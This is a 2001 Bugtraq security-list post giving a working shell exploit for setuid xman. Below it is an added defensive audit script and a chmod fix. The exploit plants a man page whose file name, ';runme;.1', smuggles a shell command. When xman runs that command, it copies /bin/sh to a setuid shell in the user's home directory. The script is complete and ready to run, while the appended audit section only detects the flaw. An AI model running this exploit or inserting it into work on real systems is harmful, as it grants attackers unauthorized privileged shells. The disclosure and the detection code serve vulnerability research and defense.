
xman (suid) exploit, made easier.


Date: 17 Jul 2001 20:28:08 -0000
From: v9@realhalo.org
To: bugtraq@securityfocus.com
Subject: xman (suid) exploit, made easier.

xman doesn't drop privileges anywhere in the 
program.  but, does support suid installation.  so, 
exploiting via a system call is much easier than the
buffer overflow in MANPATH, mentioned in another 
bugtraq posting.  here is an example of such an
exploitation possibility:

-- xxman.sh --

#!/bin/sh
# example of xman exploitation. xman
# supports privileges.  but, never
# drops them.
# Vade79 -> v9@realhalo.org -> realhalo.org. 
MANPATH=~/xmantest/
mkdir -p ~/xmantest/man1
cd ~/xmantest/man1
touch ';runme;.1'
cat << EOF >~/xmantest/runme
#!/bin/sh
cp /bin/sh ~/xmansh
chown `id -u` ~/xmansh
chmod 4755 ~/xmansh
EOF
chmod 755 ~/xmantest/runme
echo "click the ';runme;' selection," \
"exit.  then, check for ~/xmansh."
xman -bothshown -notopbox
rm -rf ~/xmantest

-- xxman.sh --

Vade79 -> v9@realhalo.org -> realhalo.org. 
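
An added defensive example, not part of the original post: an audit for the two conditions the message relies on, a man page file name containing shell metacharacters under a MANPATH directory and an xman binary installed set-id. The function names and the safe character set are assumptions made for this example.

```shell
#!/bin/sh
# Added defensive example, not code from the original post.
# Assumption: page file names end up inside a shell command line, so any
# name outside a conservative character set is worth reporting.

# Print "SUSPECT <path>" for each entry in <dir>/man*/ with an unsafe name.
audit_mandir() {
    for entry in "$1"/man*/*; do
        # An unmatched glob stays literal; skip it (but keep dangling links).
        [ -e "$entry" ] || [ -L "$entry" ] || continue
        name=${entry##*/}
        case $name in
            *[!A-Za-z0-9._+:@-]*) printf 'SUSPECT %s\n' "$entry" ;;
        esac
    done
}

# Walk a colon-separated MANPATH value; empty components are skipped.
audit_manpath() {
    rest=$1
    while [ -n "$rest" ]; do
        dir=${rest%%:*}
        case $rest in
            *:*) rest=${rest#*:} ;;
            *)   rest= ;;
        esac
        if [ -n "$dir" ]; then audit_mandir "$dir"; fi
    done
}

# True when the file carries the set-user-ID or set-group-ID bit.
is_setid() {
    [ -u "$1" ] || [ -g "$1" ]
}

# Report for the current environment; prints nothing when all is clean.
audit_manpath "${MANPATH:-}"
xman_bin=$(command -v xman 2>/dev/null || true)
if [ -n "$xman_bin" ] && is_setid "$xman_bin"; then
    printf 'SETID %s (never drops privileges, per the post)\n' "$xman_bin"
fi
```

Where the SETID line appears, removing the bit with chmod u-s,g-s on the reported path closes the privilege side of the problem regardless of what the file names contain.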
